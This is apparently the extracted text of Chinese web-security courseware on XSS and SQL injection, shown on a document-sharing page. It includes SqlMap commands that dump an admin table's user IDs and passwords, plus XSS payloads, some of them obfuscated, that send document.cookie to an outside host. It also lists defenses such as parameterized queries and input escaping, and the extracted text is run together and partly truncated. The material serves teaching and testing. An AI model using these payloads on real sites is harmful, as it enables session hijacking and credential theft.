XSS跨站攻擊及SQL注入課件_第1頁
XSS跨站攻擊及SQL注入課件_第2頁
XSS跨站攻擊及SQL注入課件_第3頁
XSS跨站攻擊及SQL注入課件_第4頁
XSS跨站攻擊及SQL注入課件_第5頁
已閱讀5頁,還剩16頁未讀 繼續免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

Web安全性測試安全性測試手段SQL注入漏洞(工具:SqlMap)XSS跨站攻擊漏洞CSRF跨站請求偽造DDOS分布式拒絕服務釣魚點擊劫持跨站腳本漏洞,SQL注入原理跨站腳本漏洞分類跨站腳本漏洞及案列漏洞解決方案漏洞的危害SQL注入漏洞

數據庫信息泄漏:數據庫中存儲的用戶隱私信息泄露。

網頁篡改:通過操作數據庫對特定網頁進行篡改。網站被掛馬,傳播惡意軟件:修改數據庫一些字段的值,嵌入網馬鏈接,進行掛馬攻擊。數據庫被惡意操作:數據庫服務器被攻擊,數據庫的系統管理員帳戶被竄改。服務器被遠程控制,被安裝后門:經由數據庫服務器提供的操作系統支持,讓黑客得以修改或控制操作系統。

XSS跨站腳本漏洞

釣魚欺騙:最典型的就是利用目標網站的反射型跨站腳本漏洞將目標網站重定向到釣魚網站,或者注入釣魚JavaScript以監控目標網站的表單輸入,甚至發起基于DHTML更高級的釣魚攻擊方式。網站掛馬:跨站后利用IFrame嵌入隱藏的惡意網站或者將被攻擊者定向到惡意網站上,或者彈出惡意網站窗口等方式都可以進行掛馬攻擊。身份盜用:Cookie是用戶對于特定網站的身份驗證標志,XSS可以盜取用戶的Cookie,從而利用該Cookie獲取用戶對該網站的操作權限。如果一個網站管理員用戶Cookie被竊取,將會對網站引發巨大的危害。盜取網站用戶信息:當能夠竊取到用戶Cookie從而獲取到用戶身份時,攻擊者可以獲取到用戶對網站的操作權限,從而查看用戶隱私信息。XSS蠕蟲:XSS

蠕蟲可以用來打廣告、刷流量、掛馬、惡作劇、破壞網上數據、實施DDoS攻擊等。SqlMap實例Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”--tables–D“wepost”/*指定數據庫Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-user/*獲取當前用戶名稱Currentuser:‘root@localhost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-db/*獲取數據庫Currentdatabase:‘wepost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–columns–T“admin”–D“wepost”Sqlmap.py–.hk/article.php?id=276–dbms“Mysql”–dump–c“userid,password”–T“admin”–D“wepost”–v1SQL注入漏洞解決方案輸入驗證錯誤消息處理加密處理存儲過程來執行所有的查詢使用專業的漏洞掃描工具禁止對重要表的Drop、Insert、Update、DeleteSQL注入漏洞解決方案對所有來自用戶輸入的數據進行嚴格檢查、對數據庫配置實用最小權限原則所有查詢語句都實用庫提供的參數化查詢接口,參數化的語句實用參數而不是將用戶輸入變量嵌入到SQL語句中對進入數據庫的特殊字符(“”<>&--;等)進行轉義處理或編碼轉換數據長度嚴格規定,能防止比較長的SQL注入語句無法正確執行數據層編碼統一避免顯示SQL錯誤信息,如類型、字段什么是XSSCrosssitescripting簡稱XSS原理:利用網站的漏洞向網站的頁面注入JAVASCRIPT等腳本內容。根源:程序的輸入、輸出沒有考慮安全因素XSSCheatSheet/xss.html了解不痛瀏覽器和各種特殊的HTML標簽如何執行腳本XSS需要使用的關鍵字

“:!--<XSS>=&{()}各類偽協議頭:

Javascript:vbscript:CSS樣式表腳本注入 Style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46,120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,1235)))盜取用戶cookie信息嵌入惡意代碼<XMLID=I>

<X> <C><![CDATA[<imgsrc="javas]]><![CDATA[cript:xx=newImage();xx.src='39/pic/163.asp?url='+escape(document.URL)+'&cookie='+escape(document.cookie);"width=0height=0>]]>

</C>

</X></xml><SPANDATASRC=#IDATAFLD=CDATAFORMATAS=HTML></SPAN>掛馬

插入惡意的腳本內容,運行病毒、木馬。釣魚

篡改網頁內容,騙取賬號、密碼等詐騙行為。劫持會話

讀取會話Cookie,傳送給第三方劫持身份。XSSWorm

使用AJAX技術,做幾何趨勢的增長傳播。非持久型XSS

需要從URL傳參,點擊鏈接觸發持久型XSS XSS內容已存儲到數據庫,寫到固定頁面。DOMXSS JAVASCRIPT處理數據輸出出現漏洞

瀏覽器的漏洞造成的XSS

表單值容易出現XSS

搜索框、信息提示、個人資料、友情鏈接、北京圖片等。

各類表單值、隱藏的表單值都很危險在搜索框中輸入“><bodyonload=alert(document.cookie)><“點擊搜索課程上圖可看到已過濾反斜杠非持久XSS持久XSS分享網站地址”/a.jsp?name=<script>alert(document.cookie)</script>”攻擊代碼

varimg=newImage();img.src=http://www.XXX.cn/log.jsp?c=“”+document.cookie”””看似前段驗證了非法字符,就已經安全了嗎?錯仍然可以通過GET方法跳過前段/groups/search?keyword=%22%3E3Cbody%20onload=alert(1)%3E%3C%22記錄會話模擬登陸劫持會話發送XSS給好友

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論